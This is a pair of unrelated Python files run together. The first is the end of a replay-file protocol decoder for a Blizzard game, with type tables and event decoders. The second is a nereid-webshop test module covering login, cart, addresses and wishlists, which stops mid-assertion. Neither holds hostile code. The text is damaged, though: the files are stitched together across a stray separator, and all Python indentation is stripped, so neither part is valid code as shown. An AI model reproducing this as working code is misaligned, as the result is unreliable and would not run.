('_array',[(0,5),10]), #75
('_struct',[[('m_signature',75,-2),('m_toonHandle',20,-1)]]), #76
('_struct',[[('m_gameFullyDownloaded',13,-14),('m_developmentCheatsEnabled',13,-13),('m_testCheatsEnabled',13,-12),('m_multiplayerCheatsEnabled',13,-11),('m_syncChecksummingEnabled',13,-10),('m_isMapToMapTransition',13,-9),('m_debugPauseEnabled',13,-8),('m_useGalaxyAsserts',13,-7),('m_platformMac',13,-6),('m_cameraFollow',13,-5),('m_baseBuildNum',6,-4),('m_buildNum',6,-3),('m_versionFlags',6,-2),('m_hotkeyProfile',46,-1)]]), #77
('_struct',[[]]), #78
('_int',[(0,16)]), #79
('_struct',[[('x',79,-2),('y',79,-1)]]), #80
('_struct',[[('m_which',12,-2),('m_target',80,-1)]]), #81
('_struct',[[('m_fileName',30,-5),('m_automatic',13,-4),('m_overwrite',13,-3),('m_name',9,-2),('m_description',29,-1)]]), #82
('_int',[(1,32)]), #83
('_struct',[[('m_sequence',83,-1)]]), #84
('_null',[]), #85
('_int',[(0,20)]), #86
('_int',[(-2147483648,32)]), #87
('_struct',[[('x',86,-3),('y',86,-2),('z',87,-1)]]), #88
('_struct',[[('m_targetUnitFlags',79,-7),('m_timer',10,-6),('m_tag',6,-5),('m_snapshotUnitLink',79,-4),('m_snapshotControlPlayerId',59,-3),('m_snapshotUpkeepPlayerId',59,-2),('m_snapshotPoint',88,-1)]]), #89
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89)}]), #90
('_struct',[[('m_target',90,-4),('m_time',87,-3),('m_verb',29,-2),('m_arguments',29,-1)]]), #91
('_struct',[[('m_data',91,-1)]]), #92
('_int',[(0,25)]), #93
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_abilCmdData',25,-1)]]), #94
('_optional',[94]), #95
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89),3:('Data',6)}]), #96
('_optional',[88]), #97
('_struct',[[('m_cmdFlags',93,-7),('m_abil',95,-6),('m_data',96,-5),('m_vector',97,-4),('m_sequence',83,-3),('m_otherUnit',43,-2),('m_unitGroup',43,-1)]]), #98
('_int',[(0,9)]), #99
('_bitarray',[(0,9)]), #100
('_array',[(0,9),99]), #101
('_choice',[(0,2),{0:('None',85),1:('Mask',100),2:('OneIndices',101),3:('ZeroIndices',101)}]), #102
('_struct',[[('m_unitLink',79,-4),('m_subgroupPriority',10,-3),('m_intraSubgroupPriority',10,-2),('m_count',99,-1)]]), #103
('_array',[(0,9),103]), #104
('_struct',[[('m_subgroupIndex',99,-4),('m_removeMask',102,-3),('m_addSubgroups',104,-2),('m_addUnitTags',64,-1)]]), #105
('_struct',[[('m_controlGroupId',1,-2),('m_delta',105,-1)]]), #106
('_struct',[[('m_controlGroupIndex',1,-3),('m_controlGroupUpdate',12,-2),('m_mask',102,-1)]]), #107
('_struct',[[('m_count',99,-6),('m_subgroupCount',99,-5),('m_activeSubgroupIndex',99,-4),('m_unitTagsChecksum',6,-3),('m_subgroupIndicesChecksum',6,-2),('m_subgroupsChecksum',6,-1)]]), #108
('_struct',[[('m_controlGroupId',1,-2),('m_selectionSyncData',108,-1)]]), #109
('_struct',[[('m_chatMessage',29,-1)]]), #110
('_struct',[[('m_speed',12,-1)]]), #111
('_int',[(-128,8)]), #112
('_struct',[[('m_delta',112,-1)]]), #113
('_struct',[[('x',87,-2),('y',87,-1)]]), #114
('_struct',[[('m_point',114,-4),('m_unit',6,-3),('m_pingedMinimap',13,-2),('m_option',87,-1)]]), #115
('_struct',[[('m_verb',29,-2),('m_arguments',29,-1)]]), #116
('_struct',[[('m_alliance',6,-2),('m_control',6,-1)]]), #117
('_struct',[[('m_unitTag',6,-1)]]), #118
('_struct',[[('m_unitTag',6,-2),('m_flags',10,-1)]]), #119
('_struct',[[('m_conversationId',87,-2),('m_replyId',87,-1)]]), #120
('_optional',[20]), #121
('_struct',[[('m_gameUserId',1,-6),('m_observe',24,-5),('m_name',9,-4),('m_toonHandle',121,-3),('m_clanTag',41,-2),('m_clanLogo',42,-1)]]), #122
('_array',[(0,5),122]), #123
('_int',[(0,1)]), #124
('_struct',[[('m_userInfos',123,-2),('m_method',124,-1)]]), #125
('_choice',[(0,3),{0:('None',85),1:('Checked',13),2:('ValueChanged',6),3:('SelectionChanged',87),4:('TextChanged',30),5:('MouseButton',6)}]), #126
('_struct',[[('m_controlId',87,-3),('m_eventType',87,-2),('m_eventData',126,-1)]]), #127
('_struct',[[('m_soundHash',6,-2),('m_length',6,-1)]]), #128
('_array',[(0,7),6]), #129
('_struct',[[('m_soundHash',129,-2),('m_length',129,-1)]]), #130
('_struct',[[('m_syncInfo',130,-1)]]), #131
('_struct',[[('m_queryId',79,-3),('m_lengthMs',6,-2),('m_finishGameLoop',6,-1)]]), #132
('_struct',[[('m_queryId',79,-2),('m_lengthMs',6,-1)]]), #133
('_struct',[[('m_animWaitQueryId',79,-1)]]), #134
('_struct',[[('m_sound',6,-1)]]), #135
('_struct',[[('m_transmissionId',87,-2),('m_thread',6,-1)]]), #136
('_struct',[[('m_transmissionId',87,-1)]]), #137
('_optional',[80]), #138
('_optional',[79]), #139
('_optional',[112]), #140
('_struct',[[('m_target',138,-6),('m_distance',139,-5),('m_pitch',139,-4),('m_yaw',139,-3),('m_reason',140,-2),('m_follow',13,-1)]]), #141
('_struct',[[('m_skipType',124,-1)]]), #142
('_int',[(0,11)]), #143
('_struct',[[('x',143,-2),('y',143,-1)]]), #144
('_struct',[[('m_button',6,-5),('m_down',13,-4),('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #145
('_struct',[[('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #146
('_struct',[[('m_achievementLink',79,-1)]]), #147
('_struct',[[('m_hotkey',6,-2),('m_down',13,-1)]]), #148
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_state',112,-1)]]), #149
('_struct',[[('m_soundtrack',6,-1)]]), #150
('_struct',[[('m_key',112,-2),('m_flags',112,-1)]]), #151
('_struct',[[('m_error',87,-2),('m_abil',95,-1)]]), #152
('_int',[(0,19)]), #153
('_struct',[[('m_decrementMs',153,-1)]]), #154
('_struct',[[('m_portraitId',87,-1)]]), #155
('_struct',[[('m_functionName',20,-1)]]), #156
('_struct',[[('m_result',87,-1)]]), #157
('_struct',[[('m_gameMenuItemIndex',87,-1)]]), #158
('_int',[(-32768,16)]), #159
('_struct',[[('m_wheelSpin',159,-2),('m_flags',112,-1)]]), #160
('_struct',[[('m_button',79,-1)]]), #161
('_struct',[[('m_cutsceneId',87,-2),('m_bookmarkName',20,-1)]]), #162
('_struct',[[('m_cutsceneId',87,-1)]]), #163
('_struct',[[('m_cutsceneId',87,-3),('m_conversationLine',20,-2),('m_altConversationLine',20,-1)]]), #164
('_struct',[[('m_cutsceneId',87,-2),('m_conversationLine',20,-1)]]), #165
('_struct',[[('m_leaveReason',1,-1)]]), #166
('_struct',[[('m_observe',24,-7),('m_name',9,-6),('m_toonHandle',121,-5),('m_clanTag',41,-4),('m_clanLogo',42,-3),('m_hijack',13,-2),('m_hijackCloneGameUserId',59,-1)]]), #167
('_optional',[83]), #168
('_struct',[[('m_state',24,-2),('m_sequence',168,-1)]]), #169
('_struct',[[('m_sequence',168,-2),('m_target',88,-1)]]), #170
('_struct',[[('m_sequence',168,-2),('m_target',89,-1)]]), #171
('_struct',[[('m_catalog',10,-4),('m_entry',79,-3),('m_field',9,-2),('m_value',9,-1)]]), #172
('_struct',[[('m_index',6,-1)]]), #173
('_struct',[[('m_shown',13,-1)]]), #174
('_struct',[[('m_recipient',12,-2),('m_string',30,-1)]]), #175
('_struct',[[('m_recipient',12,-2),('m_point',114,-1)]]), #176
('_struct',[[('m_progress',87,-1)]]), #177
('_struct',[[('m_status',24,-1)]]), #178
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_buttonLink',79,-1)]]), #179
('_struct',[[('m_behaviorLink',79,-2),('m_buttonLink',79,-1)]]), #180
('_choice',[(0,2),{0:('None',85),1:('Ability',179),2:('Behavior',180),3:('Vitals',159)}]), #181
('_struct',[[('m_announcement',181,-4),('m_announceLink',79,-3),('m_otherUnitTag',6,-2),('m_unitTag',6,-1)]]), #182
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2),('m_controlPlayerId',1,3),('m_upkeepPlayerId',1,4),('m_x',10,5),('m_y',10,6)]]), #183
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_x',10,2),('m_y',10,3)]]), #184
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_killerPlayerId',59,2),('m_x',10,3),('m_y',10,4),('m_killerUnitTagIndex',43,5),('m_killerUnitTagRecycle',43,6)]]), #185
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_controlPlayerId',1,2),('m_upkeepPlayerId',1,3)]]), #186
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2)]]), #187
('_struct',[[('m_playerId',1,0),('m_upgradeTypeName',29,1),('m_count',87,2)]]), #188
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1)]]), #189
('_array',[(0,10),87]), #190
('_struct',[[('m_firstUnitIndex',6,0),('m_items',190,1)]]), #191
('_struct',[[('m_playerId',1,0),('m_type',6,1),('m_userId',43,2),('m_slotId',43,3)]]), #192
('_struct',[[('m_key',29,0)]]), #193
('_struct',[[('__parent',193,0),('m_value',29,1)]]), #194
('_array',[(0,6),194]), #195
('_optional',[195]), #196
('_struct',[[('__parent',193,0),('m_value',87,1)]]), #197
('_array',[(0,6),197]), #198
('_optional',[198]), #199
('_struct',[[('m_eventName',29,0),('m_stringData',196,1),('m_intData',199,2),('m_fixedData',199,3)]]), #200
('_struct',[[('m_value',6,0),('m_time',6,1)]]), #201
('_array',[(0,6),201]), #202
('_array',[(0,5),202]), #203
('_struct',[[('m_name',29,0),('m_values',203,1)]]), #204
('_array',[(0,21),204]), #205
('_struct',[[('m_instanceList',205,0)]]), #206
]
# Map from protocol NNet.Game.*Event eventid to (typeid, name)
game_event_types = {
5: (78, 'NNet.Game.SUserFinishedLoadingSyncEvent'),
7: (77, 'NNet.Game.SUserOptionsEvent'),
9: (70, 'NNet.Game.SBankFileEvent'),
10: (72, 'NNet.Game.SBankSectionEvent'),
11: (73, 'NNet.Game.SBankKeyEvent'),
12: (74, 'NNet.Game.SBankValueEvent'),
13: (76, 'NNet.Game.SBankSignatureEvent'),
14: (81, 'NNet.Game.SCameraSaveEvent'),
21: (82, 'NNet.Game.SSaveGameEvent'),
22: (78, 'NNet.Game.SSaveGameDoneEvent'),
23: (78, 'NNet.Game.SLoadGameDoneEvent'),
25: (84, 'NNet.Game.SCommandManagerResetEvent'),
26: (92, 'NNet.Game.SGameCheatEvent'),
27: (98, 'NNet.Game.SCmdEvent'),
28: (106, 'NNet.Game.SSelectionDeltaEvent'),
29: (107, 'NNet.Game.SControlGroupUpdateEvent'),
30: (109, 'NNet.Game.SSelectionSyncCheckEvent'),
32: (110, 'NNet.Game.STriggerChatMessageEvent'),
34: (111, 'NNet.Game.SSetAbsoluteGameSpeedEvent'),
35: (113, 'NNet.Game.SAddAbsoluteGameSpeedEvent'),
36: (115, 'NNet.Game.STriggerPingEvent'),
37: (116, 'NNet.Game.SBroadcastCheatEvent'),
38: (117, 'NNet.Game.SAllianceEvent'),
39: (118, 'NNet.Game.SUnitClickEvent'),
40: (119, 'NNet.Game.SUnitHighlightEvent'),
41: (120, 'NNet.Game.STriggerReplySelectedEvent'),
43: (125, 'NNet.Game.SHijackReplayGameEvent'),
44: (78, 'NNet.Game.STriggerSkippedEvent'),
45: (128, 'NNet.Game.STriggerSoundLengthQueryEvent'),
46: (135, 'NNet.Game.STriggerSoundOffsetEvent'),
47: (136, 'NNet.Game.STriggerTransmissionOffsetEvent'),
48: (137, 'NNet.Game.STriggerTransmissionCompleteEvent'),
49: (141, 'NNet.Game.SCameraUpdateEvent'),
50: (78, 'NNet.Game.STriggerAbortMissionEvent'),
55: (127, 'NNet.Game.STriggerDialogControlEvent'),
56: (131, 'NNet.Game.STriggerSoundLengthSyncEvent'),
57: (142, 'NNet.Game.STriggerConversationSkippedEvent'),
58: (145, 'NNet.Game.STriggerMouseClickedEvent'),
59: (146, 'NNet.Game.STriggerMouseMovedEvent'),
60: (147, 'NNet.Game.SAchievementAwardedEvent'),
61: (148, 'NNet.Game.STriggerHotkeyPressedEvent'),
62: (149, 'NNet.Game.STriggerTargetModeUpdateEvent'),
64: (150, 'NNet.Game.STriggerSoundtrackDoneEvent'),
66: (151, 'NNet.Game.STriggerKeyPressedEvent'),
67: (156, 'NNet.Game.STriggerMovieFunctionEvent'),
76: (152, 'NNet.Game.STriggerCommandErrorEvent'),
86: (78, 'NNet.Game.STriggerMovieStartedEvent'),
87: (78, 'NNet.Game.STriggerMovieFinishedEvent'),
88: (154, 'NNet.Game.SDecrementGameTimeRemainingEvent'),
89: (155, 'NNet.Game.STriggerPortraitLoadedEvent'),
90: (157, 'NNet.Game.STriggerCustomDialogDismissedEvent'),
91: (158, 'NNet.Game.STriggerGameMenuItemSelectedEvent'),
92: (160, 'NNet.Game.STriggerMouseWheelEvent'),
95: (161, 'NNet.Game.STriggerButtonPressedEvent'),
96: (78, 'NNet.Game.STriggerGameCreditsFinishedEvent'),
97: (162, 'NNet.Game.STriggerCutsceneBookmarkFiredEvent'),
98: (163, 'NNet.Game.STriggerCutsceneEndSceneFiredEvent'),
99: (164, 'NNet.Game.STriggerCutsceneConversationLineEvent'),
100: (165, 'NNet.Game.STriggerCutsceneConversationLineMissingEvent'),
101: (166, 'NNet.Game.SGameUserLeaveEvent'),
102: (167, 'NNet.Game.SGameUserJoinEvent'),
103: (169, 'NNet.Game.SCommandManagerStateEvent'),
104: (170, 'NNet.Game.SCmdUpdateTargetPointEvent'),
105: (171, 'NNet.Game.SCmdUpdateTargetUnitEvent'),
106: (132, 'NNet.Game.STriggerAnimLengthQueryByNameEvent'),
107: (133, 'NNet.Game.STriggerAnimLengthQueryByPropsEvent'),
108: (134, 'NNet.Game.STriggerAnimOffsetEvent'),
109: (172, 'NNet.Game.SCatalogModifyEvent'),
110: (173, 'NNet.Game.SHeroTalentTreeSelectedEvent'),
111: (78, 'NNet.Game.STriggerProfilerLoggingFinishedEvent'),
112: (174, 'NNet.Game.SHeroTalentTreeSelectionPanelToggledEvent'),
}
# The typeid of the NNet.Game.EEventId enum.
game_eventid_typeid = 0
# Map from protocol NNet.Game.*Message eventid to (typeid, name)
message_event_types = {
0: (175, 'NNet.Game.SChatMessage'),
1: (176, 'NNet.Game.SPingMessage'),
2: (177, 'NNet.Game.SLoadingProgressMessage'),
3: (78, 'NNet.Game.SServerPingMessage'),
4: (178, 'NNet.Game.SReconnectNotifyMessage'),
5: (182, 'NNet.Game.SPlayerAnnounceMessage'),
}
# The typeid of the NNet.Game.EMessageId enum.
message_eventid_typeid = 1
# Map from protocol NNet.Replay.Tracker.*Event eventid to (typeid, name)
tracker_event_types = {
1: (183, 'NNet.Replay.Tracker.SUnitBornEvent'),
2: (185, 'NNet.Replay.Tracker.SUnitDiedEvent'),
3: (186, 'NNet.Replay.Tracker.SUnitOwnerChangeEvent'),
4: (187, 'NNet.Replay.Tracker.SUnitTypeChangeEvent'),
5: (188, 'NNet.Replay.Tracker.SUpgradeEvent'),
6: (183, 'NNet.Replay.Tracker.SUnitInitEvent'),
7: (189, 'NNet.Replay.Tracker.SUnitDoneEvent'),
8: (191, 'NNet.Replay.Tracker.SUnitPositionsEvent'),
9: (192, 'NNet.Replay.Tracker.SPlayerSetupEvent'),
10: (200, 'NNet.Replay.Tracker.SStatGameEvent'),
11: (206, 'NNet.Replay.Tracker.SScoreResultEvent'),
12: (184, 'NNet.Replay.Tracker.SUnitRevivedEvent'),
}
# The typeid of the NNet.Replay.Tracker.EEventId enum.
tracker_eventid_typeid = 2
# The typeid of NNet.SVarUint32 (the type used to encode gameloop deltas).
svaruint32_typeid = 7
# The typeid of NNet.Replay.SGameUserId (the type used to encode player ids).
replay_userid_typeid = 8
# The typeid of NNet.Replay.SHeader (the type used to store replay game version and length).
replay_header_typeid = 18
# The typeid of NNet.Game.SDetails (the type used to store overall replay details).
game_details_typeid = 40
# The typeid of NNet.Replay.SInitData (the type used to store the inital lobby).
replay_initdata_typeid = 69
def _varuint32_value(value):
# Returns the numeric value from a SVarUint32 instance.
for k,v in value.iteritems():
return v
return 0
def _decode_event_stream(decoder, eventid_typeid, event_types, decode_user_id):
# Decodes events prefixed with a gameloop and possibly userid
gameloop = 0
while not decoder.done():
start_bits = decoder.used_bits()
# decode the gameloop delta before each event
delta = _varuint32_value(decoder.instance(svaruint32_typeid))
gameloop += delta
# decode the userid before each event
if decode_user_id:
userid = decoder.instance(replay_userid_typeid)
# decode the event id
eventid = decoder.instance(eventid_typeid)
typeid, typename = event_types.get(eventid, (None, None))
if typeid is None:
raise CorruptedError('eventid(%d) at %s' % (eventid, decoder))
# decode the event struct instance
event = decoder.instance(typeid)
event['_event'] = typename
event['_eventid'] = eventid
# insert gameloop and userid
event['_gameloop'] = gameloop
if decode_user_id:
event['_userid'] = userid
# the next event is byte aligned
decoder.byte_align()
# insert bits used in stream
event['_bits'] = decoder.used_bits() - start_bits
yield event
def decode_replay_game_events(contents):
"""Decodes and yields each game event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
game_eventid_typeid,
game_event_types,
decode_user_id=True):
yield event
def decode_replay_message_events(contents):
"""Decodes and yields each message event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
message_eventid_typeid,
message_event_types,
decode_user_id=True):
yield event
def decode_replay_tracker_events(contents):
"""Decodes and yields each tracker event from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
tracker_eventid_typeid,
tracker_event_types,
decode_user_id=False):
yield event
def decode_replay_header(contents):
"""Decodes and return the replay header from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(replay_header_typeid)
def decode_replay_details(contents):
"""Decodes and returns the game details from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(game_details_typeid)
def decode_replay_initdata(contents):
"""Decodes and return the replay init data from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
return decoder.instance(replay_initdata_typeid)
def decode_replay_attributes_events(contents):
"""Decodes and yields each attribute from the contents byte string."""
buffer = BitPackedBuffer(contents, 'little')
attributes = {}
if not buffer.done():
attributes['source'] = buffer.read_bits(8)
attributes['mapNamespace'] = buffer.read_bits(32)
count = buffer.read_bits(32)
attributes['scopes'] = {}
while not buffer.done():
value = {}
value['namespace'] = buffer.read_bits(32)
value['attrid'] = attrid = buffer.read_bits(32)
scope = buffer.read_bits(8)
value['value'] = buffer.read_aligned_bytes(4)[::-1].strip('\x00')
if not scope in attributes['scopes']:
attributes['scopes'][scope] = {}
if not attrid in attributes['scopes'][scope]:
attributes['scopes'][scope][attrid] = []
attributes['scopes'][scope][attrid].append(value)
return attributes
def unit_tag(unitTagIndex, unitTagRecycle):
return (unitTagIndex << 18) + unitTagRecycle
def unit_tag_index(unitTag):
return (unitTag >> 18) & 0x00003fff
def unit_tag_recycle(unitTag):
return (unitTag) & 0x0003ffff
|
|
'''
Test Templates
:copyright: (c) 2014 by Openlabs Technologies & Consulting (P) LTD
:license: GPLv3, see LICENSE for more details
'''
import random
import unittest
from trytond.tests.test_tryton import USER, DB_NAME, CONTEXT
from trytond.transaction import Transaction
from test_base import BaseTestCase
from trytond.config import CONFIG
from decimal import Decimal
from nereid import request
CONFIG['smtp_from'] = 'from@xyz.com'
class TestTemplates(BaseTestCase):
"""
Test case for templates in nereid-webshop.
"""
def create_test_products(self):
# Create product templates with products
self._create_product_template(
'product 1',
[{
'category': self.category.id,
'type': 'goods',
'salable': True,
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-1',
)
self._create_product_template(
'product 2',
[{
'category': self.category2.id,
'type': 'goods',
'salable': True,
'list_price': Decimal('20'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-2',
)
self._create_product_template(
'product 3',
[{
'category': self.category3.id,
'type': 'goods',
'list_price': Decimal('30'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-3',
)
self._create_product_template(
'product 4',
[{
'category': self.category3.id,
'type': 'goods',
'list_price': Decimal('30'),
'cost_price': Decimal('5'),
'account_expense': self._get_account_by_kind('expense').id,
'account_revenue': self._get_account_by_kind('revenue').id,
}],
uri='product-4',
displayed_on_eshop=False
)
def _create_product_template(
self, name, vlist, uri, uom=u'Unit', displayed_on_eshop=True
):
"""
Create a product template with products and return its ID
:param name: Name of the product
:param vlist: List of dictionaries of values to create
:param uri: uri of product template
:param uom: Note it is the name of UOM (not symbol or code)
:param displayed_on_eshop: Boolean field to display product
on shop or not
"""
_code_list = []
code = random.choice('ABCDEFGHIJK')
while code in _code_list:
code = random.choice('ABCDEFGHIJK')
else:
_code_list.append(code)
for values in vlist:
values['name'] = name
values['default_uom'], = self.Uom.search(
[('name', '=', uom)], limit=1
)
values['sale_uom'], = self.Uom.search(
[('name', '=', uom)], limit=1
)
values['products'] = [
('create', [{
'uri': uri,
'displayed_on_eshop': displayed_on_eshop,
'code': code,
}])
]
return self.ProductTemplate.create(vlist)
def cart(self, to_login):
"""
Checking cart functionality with and without login.
Used by test_cart.
"""
qty = 7
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
self.create_test_products()
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
with app.test_client() as c:
if to_login:
self.login(c, "email@example.com", "password")
rv = c.get('/cart')
self.assertEqual(rv.status_code, 200)
sales = self.Sale.search([])
self.assertEqual(len(sales), 0)
c.post(
'/cart/add',
data={
'product': product1.id,
'quantity': qty
}
)
rv = c.get('/cart')
self.assertEqual(rv.status_code, 200)
sales = self.Sale.search([])
self.assertEqual(len(sales), 1)
sale = sales[0]
self.assertEqual(len(sale.lines), 1)
self.assertEqual(
sale.lines[0].product, product1.products[0]
)
self.assertEqual(sale.lines[0].quantity, qty)
def test_0010_home_template(self):
"""
Test for home template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/')
self.assertEqual(rv.status_code, 200)
self.assertEqual(request.path, '/')
def test_0015_login(self):
"""
Test for login template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/login')
self.assertEqual(rv.status_code, 200)
rv2 = self.login(c, 'email@example.com', 'password')
self.assertIn('Redirecting', rv2.data)
self.assertTrue(rv2.location.endswith('localhost/'))
with self.assertRaises(AssertionError):
self.login(c, 'email@example.com', 'wrong')
def test_0020_registration(self):
"""
Test for registration template.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/registration')
self.assertEqual(rv.status_code, 200)
data = {
'name': 'Registered User',
'email': 'regd_user@openlabs.co.in',
'password': 'password'
}
response = c.post('/registration', data=data)
self.assertEqual(response.status_code, 200)
data['confirm'] = 'password'
response = c.post('/registration', data=data)
self.assertEqual(response.status_code, 302)
def test_0025_nodes(self):
"""
Tests for nodes/subnodes.
Tests node properties.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
uom, = self.Uom.search([], limit=1)
values1 = {
'name': 'Product-1',
'category': self.category.id,
'type': 'goods',
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'default_uom': uom.id,
'products': [
('create', [{
'uri': 'product-1',
'displayed_on_eshop': True
}])
]
}
values2 = {
'name': 'Product-2',
'category': self.category.id,
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'default_uom': uom.id,
'products': [
('create', [{
'uri': 'product-2',
'displayed_on_eshop': True
}, {
'uri': 'product-21',
'displayed_on_eshop': True
}])
]
}
values3 = {
'name': 'Product-3',
'category': self.category.id,
'list_price': Decimal('10'),
'cost_price': Decimal('5'),
'default_uom': uom.id,
'products': [
('create', [{
'uri': 'product-3',
'displayed_on_eshop': True
}])
]
}
template1, template2, template3, = self.ProductTemplate.create([
values1, values2, values3
])
node1, = self.Node.create([{
'name': 'Node1',
'type_': 'catalog',
'slug': 'node1',
}])
self.assert_(node1)
node2, = self.Node.create([{
'name': 'Node2',
'type_': 'catalog',
'slug': 'node2',
'display': 'product.template',
}])
node3, = self.Node.create([{
'name': 'Node3',
'type_': 'catalog',
'slug': 'node3',
}])
self.Node.write([node2], {
'parent': node1
})
self.Node.write([node3], {
'parent': node2
})
# Create Product-Node relationships.
self.ProductNodeRelationship.create([{
'product': pro,
'node': node1,
} for pro in template1.products])
self.ProductNodeRelationship.create([{
'product': pro,
'node': node2,
} for pro in template2.products])
self.ProductNodeRelationship.create([{
'product': pro,
'node': node3,
} for pro in template3.products])
app = self.get_app()
for node in [node1, node2, node3]:
self.assert_(node)
self.assertEqual(node2.parent, node1)
with app.test_client() as c:
url = 'nodes/{0}/{1}/{2}'.format(
node1.id, node1.slug, 1
)
rv = c.get('/nodes/{0}/{1}'.format(node1.id, node1.slug))
self.assertEqual(rv.status_code, 200)
url = 'nodes/{0}/{1}/{2}'.format(
node2.id, node2.slug, 1
)
rv = c.get(url)
self.assertEqual(rv.status_code, 200)
def test_0030_articles(self):
"""
Tests the rendering of an article.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
article, = self.Article.search([
('uri', '=', 'test-article')
])
categ, = self.ArticleCategory.search([
('title', '=', 'Test Categ')
])
self.assertEqual(len(categ.published_articles), 0)
self.Article.publish([article])
self.assertEqual(len(categ.published_articles), 1)
with app.test_client() as c:
response = c.get('/article/test-article')
self.assertEqual(response.status_code, 200)
self.assertIn('Test Content', response.data)
self.assertIn('Test Article', response.data)
def test_0035_cart(self):
"""
Test the cart.
"""
for to_login in [True, False]:
print("Login?: {0}".format(to_login))
self.cart(to_login)
def test_0040_addresses(self):
"""
Test addresses.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
app = self.get_app()
with app.test_client() as c:
rv = c.get('/view-address')
self.assertEqual(rv.status_code, 302)
self.login(c, 'email@example.com', 'password')
rv = c.get('/view-address')
self.assertEqual(rv.status_code, 200)
# Creating an address
rv = c.get('/create-address')
self.assertEqual(rv.status_code, 200)
data = {
'name': 'Some Dude',
'street': 'Test Street',
'zip': 'zip',
'city': 'city',
'email': 'email@example.com',
'phone': '123456789',
'country': self.available_countries[0].id,
'subdivision': self.Country(
self.available_countries[0]
).subdivisions[0].id
}
# Check if zero addresses before posting.
self.assertEqual(
len(self.registered_user.party.addresses),
0
)
response = c.post(
'/create-address',
data=data
)
self.assertEqual(response.status_code, 302)
# Check that our address info is present in template data.
address, = self.registered_user.party.addresses
rv = c.get('/view-address')
self.assertIn(data['name'], rv.data)
self.assertIn(data['street'], rv.data)
self.assertIn(data['city'], rv.data)
self.assertEqual(rv.status_code, 200)
self.assertEqual(
len(self.registered_user.party.addresses),
1
)
# Now edit some bits of the address and view it again.
rv = c.get('/edit-address/{0}'.format(address.id))
self.assertEqual(rv.status_code, 200)
response = c.post(
'/edit-address/{0}'.format(address.id),
data={
'name': 'Some Other Dude',
'street': 'Street',
'streetbis': 'StreetBis',
'zip': 'zip',
'city': 'City',
'email': 'email@example.com',
'phone': '1234567890',
'country': self.available_countries[0].id,
'subdivision': self.Country(
self.available_countries[0]).subdivisions[0].id,
}
)
self.assertEqual(response.status_code, 302)
rv = c.get('/view-address')
self.assertIn('Some Other Dude', rv.data)
with self.assertRaises(AssertionError):
self.assertIn(data['name'], rv.data)
# Now remove the address.
rv = c.post(
'/remove-address/{0}'
.format(address.id)
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.party.addresses),
0
)
def test_0045_wishlist(self):
"""
Tests the wishlist.
"""
with Transaction().start(DB_NAME, USER, context=CONTEXT):
self.setup_defaults()
self.create_test_products()
app = self.get_app()
with app.test_client() as c:
# Guests will be redirected.
rv = c.post(
'/wishlists',
data={
'name': 'Testlist'
}
)
self.assertEquals(rv.status_code, 302)
self.login(c, 'email@example.com', 'password')
# No wishlists currently.
self.assertEqual(
len(self.registered_user.wishlists),
0
)
rv = c.post(
'/wishlists',
data={
'name': 'Testlist'
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(
len(self.registered_user.wishlists),
1
)
rv = c.get('/wishlists')
self.assertIn('Testlist', rv.data)
# Remove this wishlist.
rv = c.delete(
'/wishlists/{0}'.format(
self.registered_user.wishlists[0].id
)
)
self.assertEqual(rv.status_code, 200)
# Now add products.
product1, = self.ProductTemplate.search([
('name', '=', 'product 1')
])
product2, = self.ProductTemplate.search([
('name', '=', 'product 2')
])
# Adding a product without creating a wishlist
# creates a wishlist automatically.
rv = c.post(
'wishlists/products',
data={
'product': product1.products[0].id,
'action': 'add'
}
)
self.assertEqual(rv.status_code, 302)
self.assertEqual(len(self.registered_user.wishlists), 1)
self.assertEqual(
len(self.registered_user.wishlists[0].products),
1
